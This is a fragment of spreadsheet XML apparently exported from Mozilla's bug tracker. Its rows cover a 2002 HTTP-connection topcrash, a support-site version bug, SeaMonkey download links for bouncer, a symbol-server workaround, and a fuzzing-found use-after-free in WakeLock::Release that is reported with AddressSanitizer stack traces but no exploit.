      <c r="S3451" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T3451" t="n">
        <v>1</v>
      </c>
      <c r="U3451" t="n">
        <v>0</v>
      </c>
      <c r="V3451" t="n">
        <v>11</v>
      </c>
      <c r="W3451" t="inlineStr">
        <is>
          <t>This stack signature is a trunk topcrash
Rank    StackSignature    Count  
14   nsHttpConnection::OnStopRequest   20 
 	Source File :
c:/builds/seamonkey/mozilla/netwerk/protocol/http/src/nsHttpConnection.cpp line
: 649
====================================================================================================
     Count   Offset    Real Signature
[ 6   nsHttpConnection::OnStopRequest e57fa8c4 - nsHttpConnection::OnStopRequest ]
     Crash date range: 2002-12-06 to 2002-12-07
     Min/Max Seconds since last crash: 890 - 14521
     Min/Max Runtime: 7540 - 14521
     Keyword List :  
     Count   Platform List 
     3   Windows 98 4.10 build 67766222
     2   Windows 98 4.10 build 67766446
     1   Windows 98 4.90 build 73010104
     Count   Build Id List 
     6   2002120604
     No of Unique Users         4
 Stack trace(Frame) 
	 nsHttpConnection::OnStopRequest
[c:/builds/seamonkey/mozilla/netwerk/protocol/http/src/nsHttpConnection.cpp 
line 649] 
	 nsSocketRequest::OnStop
[c:/builds/seamonkey/mozilla/netwerk/base/src/nsSocketTransport.cpp  line 2767] 
	 nsSocketTransport::CompleteAsyncRead
[c:/builds/seamonkey/mozilla/netwerk/base/src/nsSocketTransport.cpp  line 716]  
     (14849091)	URL: www.zeropaid.com
     (14849091)	Comments: Browser crashed as I closed the last tab in the window
(Browser configured to show tabs all the time).
     (14848278)	Comments: Web browsing with about 6 tabs open .... pages came
closer and slower until they stopped ... .I thought it was my ADSL connection
but it turned out to be the browser ...
     (14845749)	URL: www.inlinefour.com
     (14822675)	Comments: Exiting</t>
        </is>
      </c>
      <c r="X3451" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3452">
      <c r="A3452" t="n">
        <v>1580057</v>
      </c>
      <c r="B3452" t="inlineStr">
        <is>
          <t>2019-09-09 18:30:41 -0700</t>
        </is>
      </c>
      <c r="C3452" t="inlineStr">
        <is>
          <t>Firefox KB articles still default to version 68.  Firefox 69 was released Sept 3, 2019</t>
        </is>
      </c>
      <c r="D3452" t="inlineStr">
        <is>
          <t>2019-09-10 08:15:14 -0700</t>
        </is>
      </c>
      <c r="E3452" t="n">
        <v>1</v>
      </c>
      <c r="F3452" t="n">
        <v>1</v>
      </c>
      <c r="G3452" t="n">
        <v>5</v>
      </c>
      <c r="H3452" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3452" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3452" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3452" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3452" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3452" t="inlineStr"/>
      <c r="Q3452" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3452" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3452" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3452" t="n">
        <v>1</v>
      </c>
      <c r="U3452" t="n">
        <v>0</v>
      </c>
      <c r="V3452" t="n">
        <v>2</v>
      </c>
      <c r="W3452" t="inlineStr">
        <is>
          <t>When viewed in another browser such as Google Chrome, Firefox KB articles on support.mozilla.org still default to version 68. Firefox 69 was released Sept 3, 2019 and should be the default. See also bug 1576366 comment 6.</t>
        </is>
      </c>
      <c r="X3452" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3453">
      <c r="A3453" t="n">
        <v>565310</v>
      </c>
      <c r="B3453" t="inlineStr">
        <is>
          <t>2010-05-12 07:47:16 -0700</t>
        </is>
      </c>
      <c r="C3453" t="inlineStr">
        <is>
          <t>Add SeaMonkey 2.1a1 to bouncer</t>
        </is>
      </c>
      <c r="D3453" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3453" t="n">
        <v>1</v>
      </c>
      <c r="F3453" t="n">
        <v>1</v>
      </c>
      <c r="G3453" t="n">
        <v>5</v>
      </c>
      <c r="H3453" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3453" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3453" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3453" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3453" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3453" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3453" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3453" t="inlineStr">
        <is>
          <t>[bouncer]</t>
        </is>
      </c>
      <c r="Q3453" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3453" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3453" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3453" t="n">
        <v>1</v>
      </c>
      <c r="U3453" t="n">
        <v>0</v>
      </c>
      <c r="V3453" t="n">
        <v>4</v>
      </c>
      <c r="W3453" t="inlineStr">
        <is>
          <t>The SeaMonkey team is preparing a milestone release, SeaMonkey 2.1a1 (to go public once we have enough testing, possibly Tuesday, May 18), and once again, we'd like to have the builds added to bouncer for downloads.
The relevant URLs to add are (bouncer and FTP):
http://download.mozilla.org/?product=seamonkey-2.1a1&amp;os=win&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a1/win32/en-US/SeaMonkey%20Setup%202.1%20Alpha%201.exe
http://download.mozilla.org/?product=seamonkey-2.1a1&amp;os=linux&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a1/linux-i686/en-US/seamonkey-2.1a1.tar.bz2
http://download.mozilla.org/?product=seamonkey-2.1a1&amp;os=osx&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a1/mac/en-US/SeaMonkey%202.1%20Alpha%201.dmg
As usual with the first alpha, this is en-US-only and has no updates. Complete MARs have been generated, of course, but we don't add then to bouncer usually when we have no snippets on AUS, right?</t>
        </is>
      </c>
      <c r="X3453" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3454">
      <c r="A3454" t="n">
        <v>1079004</v>
      </c>
      <c r="B3454" t="inlineStr">
        <is>
          <t>2014-10-06 21:06:11 -0700</t>
        </is>
      </c>
      <c r="C3454" t="inlineStr">
        <is>
          <t>Work around unreachable symbolpush.m.o</t>
        </is>
      </c>
      <c r="D3454" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E3454" t="n">
        <v>1</v>
      </c>
      <c r="F3454" t="n">
        <v>1</v>
      </c>
      <c r="G3454" t="n">
        <v>5</v>
      </c>
      <c r="H3454" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3454" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3454" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3454" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3454" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3454" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3454" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3454" t="inlineStr"/>
      <c r="Q3454" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3454" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3454" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3454" t="n">
        <v>1</v>
      </c>
      <c r="U3454" t="n">
        <v>0</v>
      </c>
      <c r="V3454" t="n">
        <v>11</v>
      </c>
      <c r="W3454" t="inlineStr">
        <is>
          <t>We can use symbols1.dmz.phx1.mozilla.com instead, except windows doesn't have a flow from the vlan. Does let us unblock the Fennec release, and device builds.</t>
        </is>
      </c>
      <c r="X3454" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3455">
      <c r="A3455" t="n">
        <v>1544670</v>
      </c>
      <c r="B3455" t="inlineStr">
        <is>
          <t>2019-04-15 23:49:52 -0700</t>
        </is>
      </c>
      <c r="C3455" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::WakeLock::Release</t>
        </is>
      </c>
      <c r="D3455" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:32 -0700</t>
        </is>
      </c>
      <c r="E3455" t="n">
        <v>1</v>
      </c>
      <c r="F3455" t="n">
        <v>1</v>
      </c>
      <c r="G3455" t="n">
        <v>3</v>
      </c>
      <c r="H3455" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3455" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3455" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3455" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L3455" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3455" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3455" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3455" t="inlineStr">
        <is>
          <t>[adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q3455" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3455" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3455" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T3455" t="n">
        <v>1</v>
      </c>
      <c r="U3455" t="n">
        <v>0</v>
      </c>
      <c r="V3455" t="n">
        <v>27</v>
      </c>
      <c r="W3455" t="inlineStr">
        <is>
          <t>I have seen the following crash a few times while fuzzing Firefo 68.0a1, however currently am unable to reproduce reliably. I will continue to try to minimize a testcase.
=================================================================
==6682==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000018378 at pc 0x7fb01ea64c44 bp 0x7fffce9e4e60 sp 0x7fffce9e4e58
READ of size 8 at 0x608000018378 thread T0 (Web Content)
    #0 0x7fb01ea64c43 in ~nsCOMPtr_base /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:330:9
    #1 0x7fb01ea64c43 in mozilla::dom::WakeLock::~WakeLock() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:42
    #2 0x7fb01ea656a8 in mozilla::dom::WakeLock::~WakeLock() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:39:23
    #3 0x7fb01ea643fc in mozilla::dom::WakeLock::Release() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:32:1
    #4 0x7fb01d6bb736 in UnlinkSelf /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CallbackObject.h:528:5
    #5 0x7fb01d6bb736 in ~CallbackObjectHolder /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CallbackObject.h:406
    #6 0x7fb01d6bb736 in ~Listener /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:233
    #7 0x7fb01d6bb736 in Destruct /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:525
    #8 0x7fb01d6bb736 in DestructRange /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2183
    #9 0x7fb01d6bb736 in nsTArray_Impl&lt;mozilla::EventListenerManager::Listener, nsTArrayInfallibleAllocator&gt;::RemoveElementsAtUnsafe(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2242
    #10 0x7fb01d65d24e in RemoveElementsAt /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2236:3
    #11 0x7fb01d65d24e in RemoveElementAt /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1698
    #12 0x7fb01d65d24e in RemoveElementAt /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTObserverArray.h:208
    #13 0x7fb01d65d24e in mozilla::EventListenerManager::RemoveAllListeners() /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1717
    #14 0x7fb01db9c059 in nsHTMLDocument::Open(mozilla::dom::Optional&lt;nsTSubstring&lt;char16_t&gt; &gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1269:12
    #15 0x7fb01db9eef3 in nsHTMLDocument::WriteCommon(nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1530:5
    #16 0x7fb01db9e11d in nsHTMLDocument::WriteCommon(mozilla::dom::Sequence&lt;nsTString&lt;char16_t&gt; &gt; const&amp;, bool, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1456:5
    #17 0x7fb01c8205e1 in mozilla::dom::HTMLDocument_Binding::write(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:397:9
    #18 0x7fb01cdd3ac1 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3153:13
    #19 0x7fb0245f5bf7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #20 0x7fb0245f5bf7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #21 0x7fb0245de3ef in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #22 0x7fb0245de3ef in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3072
    #23 0x7fb0245c0368 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #24 0x7fb0245fb449 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
    #25 0x7fb0246f1a37 in EvalKernel(JSContext*, JS::Handle&lt;JS::Value&gt;, EvalType, js::AbstractFramePtr, JS::Handle&lt;JSObject*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #26 0x7fb0246f3e04 in js::DirectEval(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:440:10
    #27 0x7fb0257f51e4 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:3866:10
    #28 0x287384819887  (&lt;unknown module&gt;)
0x608000018378 is located 88 bytes inside of 96-byte region [0x608000018320,0x608000018380)
freed by thread T0 (Web Content) here:
    #0 0x55acbf8359e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fb01ea643fc in mozilla::dom::WakeLock::Release() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:32:1
    #2 0x7fb01d64c7d7 in UnlinkSelf /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CallbackObject.h:528:5
    #3 0x7fb01d64c7d7 in ~CallbackObjectHolder /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CallbackObject.h:406
    #4 0x7fb01d64c7d7 in mozilla::EventListenerManager::RemoveEventListenerByType(mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::EventListenerFlags const&amp;) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:696
    #5 0x7fb01d666eaf in RemoveEventListenerByType /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:300:5
    #6 0x7fb01d666eaf in mozilla::dom::EventTarget::RemoveSystemEventListener(nsTSubstring&lt;char16_t&gt; const&amp;, nsIDOMEventListener*, bool) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:133
    #7 0x7fb01ea650af in mozilla::dom::WakeLock::DetachEventListener() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:174:12
    #8 0x7fb01ea64b2b in mozilla::dom::WakeLock::~WakeLock() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:41:3
    #9 0x7fb01ea656a8 in mozilla::dom::WakeLock::~WakeLock() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:39:23
    #10 0x7fb01ea643fc in mozilla::dom::WakeLock::Release() /builds/worker/workspace/build/src/dom/power/WakeLock.cpp:32:1
    #11 0x7fb01d6bb736 in UnlinkSelf /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CallbackObject.h:528:5
    #12 0x7fb01d6bb736 in ~CallbackObjectHolder /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CallbackObject.h:406
    #13 0x7fb01d6bb736 in ~Listener /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:233
    #14 0x7fb01d6bb736 in Destruct /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:525
    #15 0x7fb01d6bb736 in DestructRange /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2183
    #16 0x7fb01d6bb736 in nsTArray_Impl&lt;mozilla::EventListenerManager::Listener, nsTArrayInfallibleAllocator&gt;::RemoveElementsAtUnsafe(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2242
    #17 0x7fb01d65d24e in RemoveElementsAt /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2236:3
    #18 0x7fb01d65d24e in RemoveElementAt /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1698
    #19 0x7fb01d65d24e in RemoveElementAt /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTObserverArray.h:208
    #20 0x7fb01d65d24e in mozilla::EventListenerManager::RemoveAllListeners() /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1717
    #21 0x7fb01db9c059 in nsHTMLDocument::Open(mozilla::dom::Optional&lt;nsTSubstring&lt;char16_t&gt; &gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1269:12
    #22 0x7fb01db9eef3 in nsHTMLDocument::WriteCommon(nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1530:5
    #23 0x7fb01db9e11d in nsHTMLDocument::WriteCommon(mozilla::dom::Sequence&lt;nsTString&lt;char16_t&gt; &gt; const&amp;, bool, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1456:5
    #24 0x7fb01c8205e1 in mozilla::dom::HTMLDocument_Binding::write(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:397:9
    #25 0x7fb01cdd3ac1 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3153:13
    #26 0x7fb0245f5bf7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #27 0x7fb0245f5bf7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #28 0x7fb0245de3ef in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #29 0x7fb0245de3ef in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3072
    #30 0x7fb0245c0368 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #31 0x7fb0245fb449 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
    #32 0x7fb0246f1a37 in EvalKernel(JSContext*, JS::Handle&lt;JS::Value&gt;, EvalType, js::AbstractFramePtr, JS::Handle&lt;JSObject*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #33 0x7fb0246f3e04 in js::DirectEval(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:440:10
    #34 0x7fb0257f51e4 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:3866:10
    #35 0x287384819887  (&lt;unknown module&gt;)
    #36 0x621000538877  (&lt;unknown module&gt;)
    #37 0x28738483e9d0  (&lt;unknown module&gt;)
    #38 0x62100051b25f  (&lt;unknown module&gt;)
    #39 0x2873848174de  (&lt;unknown module&gt;)
    #40 0x7fb025d7d6ca in EnterJit /builds/worker/workspace/build/src/js/src/jit/Jit.cpp:103:5
    #41 0x7fb025d7d6ca in js::jit::MaybeEnterJit(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/jit/Jit.cpp:168
    #42 0x7fb0245c025e in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:407:32
    #43 0x7fb0245f6568 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
previously allocated by thread T0 (Web Content) here:
    #0 0x55acbf835d63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55acbf86a5fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7fb01ea627bc in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7fb01ea627bc in mozilla::dom::power::PowerManagerService::NewWakeLock(nsTSubstring&lt;char16_t&gt; const&amp;, nsPIDOMWindowInner*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/power/PowerManagerService.cpp:118
    #4 0x7fb01da34608 in mozilla::dom::HTMLMediaElement::CreateAudioWakeLockIfNeeded() /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:3885:28
    #5 0x7fb01da341ae in mozilla::dom::HTMLMediaElement::UpdateWakeLock() /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:3872:5
    #6 0x7fb01db1812c in mozilla::dom::HTMLVideoElement::UpdateWakeLock() /builds/worker/workspace/build/src/dom/html/HTMLVideoElement.cpp:350:21
    #7 0x7fb01da32b94 in mozilla::dom::HTMLMediaElement::PlayInternal(bool) /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:3793:3
    #8 0x7fb01da31b14 in mozilla::dom::HTMLMediaElement::Play(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:3721:5
    #9 0x7fb01ca14bdd in play /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLMediaElementBinding.cpp:1236:45
    #10 0x7fb01ca14bdd in mozilla::dom::HTMLMediaElement_Binding::play_promiseWrapper(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLMediaElement*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLMediaElementBinding.cpp:1250
    #11 0x7fb01cdd4aad in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ConvertExceptionsToPromises&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3153:13
    #12 0x7fb0245f5bf7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #13 0x7fb0245f5bf7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #14 0x7fb0245f81b2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #15 0x7fb0253433bf in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #16 0x7fb0252fc601 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:237:19
    #17 0x7fb025322d00 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:504:19
    #18 0x7fb0245f6c4b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:508:14
    #19 0x7fb0245de3ef in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #20 0x7fb0245de3ef in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3072
    #21 0x7fb0245c0368 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #22 0x7fb0245fb449 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
    #23 0x7fb0246f1a37 in EvalKernel(JSContext*, JS::Handle&lt;JS::Value&gt;, EvalType, js::AbstractFramePtr, JS::Handle&lt;JSObject*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #24 0x7fb0246f0ffb in js::IndirectEval(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:424:10
    #25 0x7fb0245f5bf7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #26 0x7fb0245f5bf7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #27 0x7fb0245f81b2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #28 0x7fb0253433bf in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
